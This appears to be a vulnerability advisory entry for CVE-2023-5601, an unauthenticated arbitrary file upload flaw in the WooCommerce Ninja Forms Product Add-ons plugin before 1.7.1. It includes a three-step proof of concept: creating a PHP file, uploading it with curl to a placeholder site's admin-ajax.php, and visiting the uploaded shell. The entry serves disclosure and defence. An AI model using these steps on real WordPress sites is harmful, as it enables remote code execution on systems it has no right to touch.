Lucene search
WpvulndbWPEX-ID:0035EC5E-D405-4EB7-8FE4-29DD0C71E4BCHistoryOct 16, 2023 - 12:00 a.m.
WooCommerce Ninja Forms Product Add-ons < 1.7.1 - Unauthenticated Arbitrary File Upload
2023-10-1600:00:00
wpvulndb
33
arbitrary file upload
woocommerce
ninjaforms
Description The plugin does not validate the file to be uploaded, allowing any unauthenticated users to upload arbitrary files to the server, leading to RCE.
Make sure to have both WooCommerce and NinjaForms 3.4.34.2 (NF's latest version on the 3.4 branch) installed, then follow those instructions:
1 - Run the following shell command to create a PHP file who's mime type will be detected as text/plain:
echo 'Hello world! <?php phpinfo();' > shell.php
2 - Run the following curl command to upload the malicious PHP file onto the site:
curl 'https://example.com/wp-admin/admin-ajax.php' -F 'action=wc_nf_submit' -F 'f[][email protected]'
3 - Visit the uploaded shell at 'https://example.com/wp-content/uploads/YYYY/MM/shell.phpRelated
cvelist
cvelist
nvd
nvd
CVE-2023-5601
2023-11-06 21:15:10
wpvulndb
wpvulndb
cve
cve
CVE-2023-5601
2023-11-06 21:15:10
prion
prion
Default credentials
2023-11-06 21:15:00
wordfence
wordfence
9.8 High
AI Score
Confidence
High
0.003 Low
EPSS
Percentile
69.3%
Related for WPEX-ID:0035EC5E-D405-4EB7-8FE4-29DD0C71E4BC